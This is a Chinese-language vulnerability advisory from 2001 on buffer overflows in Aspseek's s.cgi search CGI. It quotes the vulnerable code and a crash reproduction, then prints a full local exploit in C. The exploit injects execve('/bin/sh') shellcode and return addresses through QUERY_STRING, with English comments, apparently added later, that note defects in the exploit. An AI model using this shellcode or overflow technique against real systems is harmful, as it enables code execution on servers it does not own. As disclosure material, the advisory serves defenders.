
Aspseek存在缓冲溢出的漏洞


发布时间:2001-03-20
更新时间:2001-03-20
严重程度:
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Aspseek v1.0.0 - 1.0.3
详细描述
Aspseek搜索引擎类似于许多C/C++搜索引擎,使用MYSQL数据库作为数据存储。
一旦编译和安装完成,会在你的WEB服务器的cgi-bin目录下留下一个s.cgi的拷贝。
这个脚本负责处理搜索引擎的输入输出,接受用户提交的数据并输出搜索结果,而
在解析用户提交的数据时存在多个缓冲区溢出:
1:sc.cpp程序中存在问题:
             int search(char *exe, char *arg) {
             ==>
                if ((env = getenv("QUERY_STRING")))
               {
                   strcpy(query_string, env);
                   ....
               }
             <==
             }

query_string被定义为query_string[STRSIZ],即query_string[4 x 1024];
传递10272个字符即可触发缓冲区溢出,但这个漏洞无法远程利用,因为APACHE
服务程序默认最多接受长度为8190字节的URL。

2:
         templates.cpp中存在问题:
             int CCgiQuery::ParseCgiQuery(char* query, char* templ) {
             ==>
                  else if ((!STRNCMP(token, "tmpl="))
                  {
                       char* tmpl = token + 5;
                       char tmplu[2000];
                       sprintf(tmplu, "&tmpl=%s", tmpl);
                       ....
                  }
            <==
            }

上面是一个典型的缓冲溢出,超过5148个字节将导致缓冲溢出。因此可以在APACHE上
进行远程利用。
如:        
             [root@linux cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`"
             [root@linux cgi-bin]# ./s.cgi

             Content-type: text/html

             <html><body>Can't open template file 'aaaaa...............'!</body></html>
             Segmentation Fault (core dumped)

             [root@linux cgi-bin]# gdb s.cgi core

             GNU gdb 5.0
             Copyright 2000 Free Software Foundation, Inc.
             GDB is free software, covered by the GNU General Public License, and you are
             welcome to change it and/or distribute copies of it under certain conditions.
             Type "show copying" to see the conditions.
             There is absolutely no warranty for GDB.  Type "show warranty" for details.
             This GDB was configured as "i386-asplinux-linux"...
             Core was generated by `./s.cgi'.
             Program terminated with signal 11, Segmentation fault.

             #0  0x61616161 in ?? ()


测试代码
下面是一个本地利用程序,可以导致派生出一个SHELL:


/*
* Aspseek v1.0.0 - 1.0.3 -Proof of Concept eXploit-
* Tested on Redhat 7.0, Asplinux RC3 (v1.1)
*
* by:  NeilK (neilk@alldas.de/neil@alldas.de)
*    http://neilk.alldas.de
*
*     Local proof of concept buffer overflow exploit for s.cgi
*    its not suid/sgid but it can be remote :)
*
*    Line #1228 - templates.cpp
*        char* tmpl = token + 5;
*        char tmplu[2000];
*        sprintf(tmplu, "&tmpl=%s", tmpl)
*
* greetz: mjm, all @alldas.de
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Tunables for the local PoC below; BUFSIZE matches the 5148-byte figure the
 * advisory text gives for the tmplu overflow. */
#define NOP 0x90       /* filler byte main() writes between the "q=a&tmpl=" prefix and the payload */
#define BUFSIZE 5148
#define OFFSET -200    /* default adjustment added to get_sp(); argv[1] overrides it in main() */
#define RETURNS 2      /* number of 4-byte words written at the tail of the buffer */

/* Payload bytes copied verbatim by main(). Declared unsigned char[], so the
 * strlen() calls on it below involve a pointer-signedness mismatch that
 * compilers warn about. */
unsigned char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
    "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

/* Reads the current stack pointer on x86-32: the asm leaves %esp in %eax and
 * the function then falls off its end with no return statement, relying on
 * %eax being the return register. That is undefined behavior in standard C
 * and not portable beyond 32-bit x86 (on x86-64 it would at best capture the
 * low 32 bits of the stack pointer). */
long get_sp () { __asm__ ("mov %esp, %eax"); }

/* Local proof-of-concept driver from the advisory: fills a BUFSIZE-byte
 * QUERY_STRING value ("q=a&tmpl=" prefix, NOP filler, the shellcode bytes,
 * then RETURNS copies of get_sp()+offset), exports it, and exec's ./s.cgi
 * from the current directory. Reproduced for reference; the defects noted
 * inline are in the PoC itself and make it x86-32/Linux-specific and
 * formally undefined. argv[1], if present, overrides OFFSET via atoi(),
 * which reports no parse errors. Returns only via exit(1) if exec fails. */
int
main (int argc, char *argv[])
{
    char buffer[BUFSIZE];
    int i, offset;
    unsigned long ret;

    fprintf(stderr, "Aspseek v1.0.3 -Proof of Concept eXploit-\n");
    fprintf(stderr, "by neilk@alldas.de/neil@alldas.de\n");

    if (argc > 1)
            offset = atoi(argv[1]);   /* non-numeric input silently becomes 0 */
      else
            offset = OFFSET;
  
      memcpy(buffer, "q=a&tmpl=", 9);
      /* int i is compared against a size_t expression (signed/unsigned
       * promotion), and strlen() on an unsigned char[] mismatches its
       * const char * parameter. */
      for (i = 9; i < (BUFSIZE - strlen(shellcode) - (RETURNS*4)); i++)
            *(buffer + i) = NOP;

      memcpy (buffer + i, shellcode, strlen(shellcode));

      ret = get_sp();   /* x86-32 only; see get_sp() */

      /* Stores a long through a char buffer at 4-byte steps: assumes
       * sizeof(long) == 4 (32-bit ABI) and is an unaligned, type-punned
       * write; with an 8-byte long the last store runs past the buffer. */
      for (i = BUFSIZE - (RETURNS*4); i < BUFSIZE; i += 4)
            *(long *) &buffer[i] = ret+offset;

      buffer[BUFSIZE] = '\0';   /* NOTE(review): one past the end of buffer[BUFSIZE]; out-of-bounds write in the PoC itself */

      /* Format/argument mismatch: %p expects void * and %d expects int, but
       * the arguments are unsigned long and size_t respectively. */
      fprintf(stderr, "[return address = %p] [offset = %d] [buffer size = %d]\n", ret + offset, offset, strlen(buffer));

      setenv("QUERY_STRING", buffer, 1);
  
      /* execl() is declared in <unistd.h>, which this file never includes
       * (implicit declaration); exit(1) is reached only if the exec fails. */
      execl("./s.cgi", "s.cgi", NULL);
      exit(1);
}

解决方案
尚无

相关信息
本信息由NeilK (neil@alldas.de/neilk@alldas.de) www.alldas.de提供。